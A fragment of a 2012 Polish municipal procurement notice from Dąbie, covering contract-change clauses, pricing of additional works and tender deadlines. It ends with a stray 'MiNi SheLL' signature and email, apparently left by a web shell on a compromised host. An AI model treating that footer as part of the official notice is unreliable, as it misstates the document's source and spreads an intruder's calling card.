a.Terminu wykonania zamówienia, gdy zmiana spowodowana jest okolicznościami, których nie można było przewidzieć w chwili jej zawarcia a w szczególności warunkami atmosferycznymi, klęskami żywiołowymi, niemożliwymi do przewidzenia warunkami geologicznymi terenu budowy, odmiennymi od  przyjętych w dokumentacji projektowej,
b.przyczynami zależnymi od Zamawiającego, np. nieterminowe oddanie placu budowy, 
c.sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami:
niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót ,
pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego
przedmiotu umowy;
pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
wystąpi konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych, technologicznych, niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie rozwiązań przewidzianych w projekcie groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, skutkowałoby koniecznością ponoszenia wyższych kosztów eksploatacji obiektu bądź byłoby korzystne dla Zamawiającego ze względów  ekonomicznych, ochrony środowiska itp.
3.Jeżeli w toku realizacji zadania wystąpi konieczność wykonania robót dodatkowych, których wykonanie stało się konieczne na skutek sytuacji, których nie można było wcześniej przewidzieć, gdy z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów lub gdy wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego, Wykonawca zobowiązany jest wykonać te roboty na dodatkowe zamówienie Zamawiającego za wynagrodzeniem obliczonym wg stawek kalkulacyjnych przyjętych w ofercie oraz oferowanych cen sprzętu i materiałów. 
Dla materiałów (i ewentualnie sprzętu) niewystępujących w ofercie Wykonawcy, ceny materiałów (i ewentualnie sprzętu) nie mogą być wyższe niż średnie ceny publikowane w Sekocenbudzie za ostatni miesiąc poprzedzający zlecenie robót dodatkowych. Podstawą do ustalania kosztorysowych nakładów rzeczowych będą odpowiednie Katalogi Nakładów Rzeczowych (KNR-y).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego: ulica Szeroka 4,   66-615 Dąbie, pokój nr 5 w budynku Urzędu Gminy Dąbie u Tadeusza Szejbakowskiego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 10:00, miejsce: W siedzibie zamawiającego:
ulica Szeroka 4,   66-615 Dąbie, pokój nr 2 (Sekretariat) w budynku Urzędu Gminy Dąbie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com